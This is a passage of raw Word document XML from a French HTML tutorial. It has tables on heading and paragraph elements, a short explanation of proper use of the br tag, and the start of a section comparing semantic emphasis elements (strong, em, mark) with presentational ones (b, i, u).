                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre du document, unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>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Plusieurs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> concurrents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="131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h2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Grande section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour un sous-titre de carte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1311"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sous-section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>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Descendre à </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour « faire plus petit »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="131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p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Paragraphe de texte courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Empiler des </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour créer de l'espace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1311"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Retour à la ligne au sein d'un même paragraphe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simuler des paragraphes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="131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hr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Séparation thématique entre sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Dessiner une ligne décorative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la plus mal utilisée du langage. Elle sert à l'intérieur d'un poème, d'une adresse postale ou d'un titre sur deux lignes — jamais à créer de l'espace vertical. Pour cela, il existe les marges CSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`br` appartient au contenu, pas à la mise en page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 Correct : une adresse postale --&gt;</w:t>
        <w:br/>
        <w:t>&lt;address&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  12 rue des Lilas&lt;br&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  75011 Paris&lt;br&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  France</w:t>
        <w:br/>
        <w:t>&lt;/address&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Incorrect : des paragraphes simulés --&gt;</w:t>
        <w:br/>
        <w:t>&lt;p&gt;Premier paragraphe&lt;br&gt;&lt;br&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;p&gt;Deuxième paragraphe&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Mise en valeur : sens ou apparence ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML distingue deux familles. Les éléments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sémantiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> expriment une intention : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> signale une importance, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une insistance. Les éléments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>de présentation historique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — décrivent une apparence sans sens précis ; ils restent valides, mais doivent rester marginaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.12 — Sept éléments de mise en valeur et leur sens réel</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117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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Sens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="203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Rendu par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Quand l'utiliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>strong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2665"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Importance forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2038"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avertissement, mot clé décisif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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em</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Insistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="203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Italique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Nuance de sens, accent d'intonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2665"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attention sans importance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2038"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom de produit dans une interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Terme étranger, voix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="203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Italique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Mot latin, pensée, nom d'œuvre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2665"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pertinence dans un contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2038"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fond jaune</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résultat de recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="117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small</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Mention secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="203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Plus petit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Mentions légales, notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1176"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2665"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annotation non textuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2038"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Souligné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faute signalée, nom propre chinois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
